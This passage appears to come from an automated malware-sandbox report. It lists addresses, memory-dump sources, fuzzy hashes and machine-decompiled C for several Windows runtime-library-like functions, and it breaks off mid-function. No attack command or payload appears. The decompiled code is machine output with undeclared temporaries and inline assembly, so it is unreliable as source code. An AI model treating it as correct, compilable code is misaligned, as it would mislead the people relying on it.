0x04bfb936
0x04bfb939
0x04bfb93d
0x04bfb948
0x04bfb9a0
0x04bfb9a0
0x04bfb9a4
0x04bfb9bf
0x04bfb9c4
0x04bfb9c6
0x04bfb9cd
0x04bfb9d1
0x04bfbad4
0x04bfbad8
0x04bfbada
0x04bfbadc
0x04bfbadc
0x04bfbadf
0x04bfbae0
0x04bfbae2
0x04bfbae4
0x04bfbaec
0x04bfbaee
0x04bfbaf0
0x04bfbaf0
0x04bfbaec
0x04bfbafb
0x04bfbafc
0x04bfbafe
0x04bfbb01
0x04bfbb01
0x00000000
0x04bfbb06
0x04bfb9d7
0x04bfb9db
0x04bfb9db
0x04bfb9de
0x04bfb9de
0x04bfb9e4
0x04bfb9e7
0x04bfb9ea
0x04bfb9ec
0x04bfb9ef
0x04bfb9f3
0x04bfba1b
0x04bfba1b
0x04bfba23
0x04bfba24
0x04bfba27
0x04bfba2a
0x04bfba2b
0x04bfba2e
0x04bfba30
0x04bfba37
0x04bfba3f
0x04bfba9c
0x04bfbaa2
0x04bfbb13
0x04bfbb15
0x04bfbaae
0x04bfbaae
0x04bfbab3
0x04bfbab5
0x04bfbaba
0x04bfbac8
0x04bfbac8
0x04bfbaba
0x04bfbacd
0x04bfbacf
0x00000000
0x04bfbacf
0x04bfbb1a
0x00000000
0x04bfbb1c
0x04bfbaa7
0x04bfbb11
0x00000000
0x04bfbb11
0x04bfbaa9
0x00000000
0x00000000
0x00000000
0x00000000
0x04bfba41
0x04bfba41
0x04bfba41
0x04bfba58
0x04bfba5d
0x04bfba62
0x00000000
0x00000000
0x04bfba64
0x04bfba67
0x04bfba68
0x04bfba69
0x04bfba6c
0x04bfba6f
0x04bfba71
0x04bfba78
0x04bfba80
0x00000000
0x00000000
0x04bfba90
0x04bfba90
0x04bfba97
0x00000000
0x04bfba97
0x04bfb9f5
0x04bfb9f7
0x04bfb9f7
0x04bfb9fa
0x04bfba03
0x04bfba07
0x04bfba0c
0x04bfba10
0x04bfba17
0x00000000
0x04bfb9f7
0x04bfb9a6
0x04bfb9a8
0x04bfb9af
0x04bfb9b3
0x00000000
0x00000000
0x04bfb9b9
0x00000000
0x04bfb9b9
0x04bfb94d
0x04bfb98f
0x04bfb995
0x04bfb999
0x04bfb960
0x04bfb967
0x04bfb968
0x04bfb96a
0x00000000
0x04bfb96a
0x04bfb99b
0x04bfb99e
0x00000000
0x00000000
0x00000000
0x04bfb99e
0x04bfb951
0x04bfb954
0x04bfb95a
0x04bfb95e
0x04bfb972
0x04bfb979
0x04bfb97d
0x04bfb97f
0x04bfb980
0x04bfb982
0x04bfb984
0x00000000
0x04bfb984
0x00000000
0x04bfb926
0x00000000
0x04bfb926

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b621460f96d4f5cca59598f0eadabd13c215723871e15d817fbe5014405cc5f4
Instruction ID: 4733af82d44b5c9e40df24d7ae64240dac4e8e9de0b7ac154b394867c6266923
Opcode Fuzzy Hash: b621460f96d4f5cca59598f0eadabd13c215723871e15d817fbe5014405cc5f4
Instruction Fuzzy Hash: 65712F32204701AFEB31DF18CC41F66B7E5EB44724F2089A8E6598B6A1EB74F949DB40

Uniqueness

Uniqueness Score: -1.00%

Function 04BE6DC9, Relevance: .2, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E04BE6DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L04B84620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E04BE6B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E04B87D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E04BA9AE0();
					_t87 = L04B877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E04BE795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E04BE795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E04BE795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E04BE795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L04B84620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E04BE6B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E04BE6B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E04BE6B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E04BE6B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E04B87D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E04BA9AE0();
								L04B877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L04B82400( &_v36);
							if(_v24 >= 0) {
								_t87 = L04B82400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L04B82400( &_v52);
							}
							if(_v28 >= 0) {
								return L04B82400( &_v60);
							}
						}
					}
				}
				return _t87;
			}

0x04be6dd4
0x04be6dde
0x04be6de1
0x04be6de3
0x04be6de6
0x04be6de9
0x04be6dec
0x04be6def
0x04be6df2
0x04be6df5
0x04be6dfe
0x04be6e04
0x04be6e09
0x04be6e0d
0x04be6e18
0x04be6e1b
0x04be6e22
0x04be6e2d
0x04be6e30
0x04be6e36
0x04be6e42
0x04be6e4d
0x04be6e50
0x04be6e55
0x04be6e5c
0x04be6e6e
0x04be6e5e
0x04be6e67
0x04be6e67
0x04be6e73
0x04be6e74
0x04be6e77
0x04be6e7c
0x04be6e7d
0x04be6e8e
0x04be6e93
0x04be6e9c
0x04be6ea8
0x04be6eab
0x04be6eac
0x04be6eb3
0x04be6ecd
0x04be6edc
0x04be6ee2
0x04be6ee5
0x04be6ef2
0x04be6efb
0x04be6f01
0x04be6f06
0x04be6f0b
0x04be6f11
0x04be6f1a
0x04be6f22
0x04be6f26
0x04be6f26
0x04be6f33
0x04be6f41
0x04be6f44
0x04be6f47
0x04be6f54
0x04be6f65
0x04be6f77
0x04be6f7c
0x04be6f82
0x04be6f91
0x04be6f99
0x04be6fa3
0x04be6fae
0x04be6fae
0x04be6fba
0x04be6fbb
0x04be6fbc
0x04be6fc1
0x04be6fc2
0x04be6fd3
0x04be6fd8
0x04be6fd8
0x04be6fdf
0x04be6fe8
0x04be6fee
0x04be6fee
0x04be6ff5
0x04be6ffb
0x04be6ffb
0x04be7004
0x00000000
0x04be700a
0x04be7004
0x04be6eb3
0x04be6e9c
0x04be7015

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction ID: 91fdae5748d571802b0191bf4a35ca4be035db0a84ef5c5778d7148f84ad90f4
Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction Fuzzy Hash: 54718071A00219EFDB14DFA5C944AEEBBB9FF88704F1444A9E505E7250EB30FA41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04B652A5, Relevance: .2, Instructions: 161
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E04B652A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E04B7EEF0(0x4c579a0);
					_t104 =  *0x4c58210; // 0xa92c78
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E04B7EB70(_t93, 0x4c579a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E04BA9890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E04B7EEF0(0x4c579a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E04B7EB70(0, 0x4c579a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0xa92c85
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E04B9F0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E04B7EEF0(0x4c579a0);
									__eflags =  *0x4c58210 - _t104; // 0xa92c78
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x4c58210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E04BE4888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E04B7EB70(_t95, 0x4c579a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E04BA95D0();
											L04B877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E04BA95D0();
											L04B877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E04B7EB70(_t93, 0x4c579a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E04BA95D0();
										L04B877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E04BA95D0();
										L04B877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E04B9F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

0x04b652a5
0x04b652ad
0x04b652b0
0x04b652b3
0x04b652b7
0x04b652ba
0x04b652bf
0x04b652c4
0x04b652cc
0x00000000
0x00000000
0x04b652ce
0x04b652d9
0x04b652dd
0x04b652e7
0x04b652f7
0x04b652f9
0x04b652fd
0x04bc0dcf
0x04bc0dd5
0x04bc0dd6
0x04bc0dd7
0x04bc0dd8
0x04bc0dd9
0x04bc0dde
0x04bc0ddf
0x04bc0de0
0x04bc0de1
0x04bc0de2
0x04bc0de5
0x04bc0dea
0x04bc0dec
0x04bc0f60
0x04bc0f64
0x04bc0f70
0x04bc0f76
0x04bc0f79
0x04bc0f79
0x00000000
0x04bc0f64
0x04bc0df2
0x04bc0df7
0x04bc0e04
0x04bc0e0d
0x04bc0e0d
0x04bc0e10
0x04bc0e1a
0x04bc0e1c
0x04bc0e4c
0x04bc0e52
0x04bc0e61
0x04bc0e67
0x04bc0e6b
0x04bc0e70
0x04bc0e76
0x04bc0ed7
0x04bc0edc
0x04bc0ee0
0x04bc0ee6
0x04bc0eea
0x04bc0eed
0x04bc0ef0
0x04bc0ef3
0x04bc0ef6
0x04bc0ef9
0x04bc0efe
0x04bc0f01
0x04bc0f01
0x04bc0f0b
0x04bc0f12
0x04bc0f16
0x04bc0f18
0x04bc0f1b
0x04bc0f2c
0x04bc0f31
0x04bc0f31
0x04bc0f35
0x04bc0f39
0x04bc0f3a
0x04bc0f3c
0x04bc0f3f
0x04bc0f50
0x04bc0f55
0x04bc0f55
0x04bc0f59
0x04b652eb
0x04b652f1
0x04b652f1
0x04bc0e7d
0x04bc0e84
0x04bc0e88
0x04bc0e8a
0x04bc0e8d
0x04bc0e9e
0x04bc0ea3
0x04bc0ea3
0x04bc0ea7
0x04bc0eaf
0x04bc0eb3
0x04bc0eb9
0x04bc0eb9
0x04bc0ebc
0x04bc0ecd
0x04bc0ecd
0x00000000
0x04bc0eb3
0x04bc0e21
0x04bc0e2b
0x04bc0e2f
0x04bc0e30
0x04bc0e3a
0x04bc0e3f
0x04bc0e41
0x00000000
0x00000000
0x04bc0e47
0x00000000
0x04bc0e47
0x04bc0df9
0x04bc0dfe
0x00000000
0x00000000
0x00000000
0x04bc0dfe
0x04b65303
0x04b65307
0x00000000
0x04b65309
0x00000000
0x04b65309
0x04b65307
0x04b652e9
0x04b652e9
0x00000000
0x04b652e9
0x04b6530e
0x00000000

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0641285d8ef4540d425e23663c4c3174752e255da28cbfbac0bb4f6ff8ea2061
Instruction ID: 603432bbd336088060f079be29795d53337ffb0bb90ac34fea86402e69bce166
Opcode Fuzzy Hash: 0641285d8ef4540d425e23663c4c3174752e255da28cbfbac0bb4f6ff8ea2061
Instruction Fuzzy Hash: 0B51D071205342EBEB21EF64C881B2BBBE5FF40718F10099EE49587650E774F890CB92

Uniqueness

Uniqueness Score: -1.00%

Function 04B92AE4, Relevance: .2, Instructions: 159
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04B92AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x4c58204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x4c58208; // 0x4c58207
				_t8 = _t57 + 0x4c58208; // 0x4c58207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x4c58450; // 0xa91776
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x4c5821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x4c56d5c; // 0x7f970654
							_t72 =  *0x4c56d5c; // 0x7f970654
							_t75 =  *0x4c56d5c; // 0x7f970654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x4c56d5c; // 0x7f970654
							_t84 =  *0x4c56d5c; // 0x7f970654
							_t87 =  *0x4c56d5c; // 0x7f970654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E04BAF3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}

0x04b92ae4
0x04b92aec
0x04b92aef
0x04b92af4
0x04b92af7
0x04b92afd
0x04b92b92
0x04b92b92
0x04b92b97
0x04b92b9c
0x04b92b9c
0x04b92b03
0x04b92b06
0x04b92b09
0x04b92b09
0x04b92b0f
0x04b92b15
0x04b92b15
0x04b92b1b
0x04b92b1e
0x04b92b21
0x04b92b26
0x04b92b29
0x04b92b81
0x04b92b84
0x04b92c0e
0x04b92c15
0x04b92c24
0x04b92c24
0x04b92b8a
0x04b92b8a
0x04b92b8a
0x04b92b8a
0x04b92b90
0x00000000
0x00000000
0x00000000
0x00000000
0x04b92b4a
0x04b92b4a
0x04b92b4d
0x04b92b53
0x00000000
0x00000000
0x04b92b55
0x04b92b58
0x04b92bb7
0x04bd5d1b
0x04bd5d37
0x04bd5d47
0x04bd5d53
0x04b92bbd
0x04b92bbd
0x04b92bbd
0x04b92bb7
0x04b92b5d
0x04b92c2f
0x04bd5d5b
0x04bd5d77
0x04bd5d87
0x04bd5d93
0x04b92c35
0x04b92c35
0x04b92c35
0x04b92c2f
0x04b92b65
0x04b92b9f
0x04b92ba2
0x04b92b67
0x04b92b67
0x04b92b69
0x04b92b6b
0x04b92b6e
0x04b92bc9
0x04b92bcc
0x04b92bcf
0x04b92bd4
0x04b92bd6
0x04b92bd6
0x04b92bdb
0x04b92c02
0x04b92c05
0x04b92c07
0x00000000
0x04b92c07
0x04b92be0
0x04b92c00
0x04b92c3f
0x04b92c3f
0x00000000
0x04b92c00
0x04b92be5
0x04b92be7
0x04b92bec
0x04b92bf4
0x04b92bf6
0x00000000
0x04b92bf6
0x04b92b70
0x04b92b76
0x04b92b2b
0x04b92b2b
0x04b92b2d
0x04b92b2f
0x04b92b32
0x04b92b35
0x04b92b3a
0x00000000
0x04b92b40
0x04b92b43
0x04b92b45
0x04b92b47
0x04b92b4a
0x04b92b4d
0x04b92b53
0x00000000
0x00000000
0x00000000
0x04b92b53
0x04b92b78
0x04b92b78
0x04b92b7b
0x04b92b7e
0x00000000
0x04b92b7e
0x04b92b76
0x04b92ba5
0x04b92ba5
0x04b92ba8
0x04b92bad
0x00000000
0x00000000
0x04b92baf
0x04b92baf
0x04b92bc2
0x00000000

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a3f263ebdf7faf9bbe2b8e15901b31d8e7307562bc3f1ffe9dd270f916afa60
Instruction ID: 24b0d8750a5fa2a06594cb77c2973cd34587ae0828df24f38a8bd041ce4cc480
Opcode Fuzzy Hash: 6a3f263ebdf7faf9bbe2b8e15901b31d8e7307562bc3f1ffe9dd270f916afa60
Instruction Fuzzy Hash: 6951707AF001159B8B18DF1CC8909BDB7F1FB9870071588EAE846AB355E734BE51D790

Uniqueness

Uniqueness Score: -1.00%

Function 04B8DBE9, Relevance: .1, Instructions: 149
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E04B8DBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E04B6CC50(E04B64510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E04B87D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E04C38ED6(_t102, _t98);
						}
						_t76 = _v44;
						E04B82280(_t58, _v44);
						E04B8DD82(_v44, _t102, _t98);
						E04B8B944(_t102, _v5);
						return E04B7FFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x4c58628; // 0x0
							_v28 = _t67;
							_t68 =  *0x4c5862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
